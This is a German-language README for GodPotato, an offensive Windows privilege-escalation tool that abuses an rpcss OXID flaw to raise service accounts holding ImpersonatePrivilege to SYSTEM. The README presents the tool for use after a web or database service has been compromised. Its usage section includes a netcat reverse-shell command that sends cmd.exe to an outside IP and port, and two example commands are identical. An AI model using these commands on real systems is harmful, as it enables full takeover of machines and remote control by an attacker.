
DCOM-basiertes Privilegieneskalationstool für Windows Server 2012-2022 und Windows 8-11, das Benutzer mit ImpersonatePrivilege über die rpcss-oxid-Sicherheitslücke auf NT AUTHORITY\SYSTEM erhöht.
Basierend auf der Geschichte der Potato-Privilege-Eskalation der letzten 6 Jahre, vom Anfang von RottenPotato bis zum Ende von JuicyPotatoNG, habe ich durch die Erforschung von DCOM eine neue Technologie entdeckt, die eine Privilege-Eskalation unter Windows 2012 bis Windows 2022 ermöglicht. Vorausgesetzt, Sie haben die Berechtigung "ImpersonatePrivilege". Dann sind Sie "NT AUTHORITY\SYSTEM", in der Regel haben WEB-Dienste und Datenbankdienste die Berechtigung "ImpersonatePrivilege".
Die Potato-Privilege-Eskalation wird normalerweise verwendet, wenn wir WEB/Datenbank-Berechtigungen erhalten. Wir können einen Dienstbenutzer mit niedrigen Berechtigungen auf "NT AUTHORITY\SYSTEM"-Berechtigungen anheben. Allerdings hat das historische Potato keine Möglichkeit, auf den neuesten Windows-Systemen zu laufen. Als ich DCOM erforschte, fand ich eine neue Methode, die eine Privilege-Eskalation durchführen kann. Es gibt einige Defekte in rpcss beim Umgang mit oxid, und rpcss ist ein Dienst, der vom System geöffnet werden muss. Daher kann es auf fast jedem Windows-Betriebssystem ausgeführt werden. Ich habe es GodPotato genannt.
Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11
FFFFF FFF FFFFFFF
FFFFFFF FFF FFFFFFFF
FFF FFFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFF
FFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFF
FFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFF
FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFF
FFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFF
FFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFF
FFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFF
Argumente:
-cmd Erforderlich:True Befehlszeile (Standard cmd /c whoami)
Beispiel:
GodPotato -cmd "cmd /c whoami"
Verwenden Sie die integrierte Clsid des Programms für die Privilege-Eskalation und führen Sie einen einfachen Befehl aus
GodPotato -cmd "cmd /c whoami"

Passen Sie Clsid an und führen Sie Befehle aus
GodPotato -cmd "cmd /c whoami"

Führen Sie Reverse-Shell-Befehle aus
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
zcgonvh
skay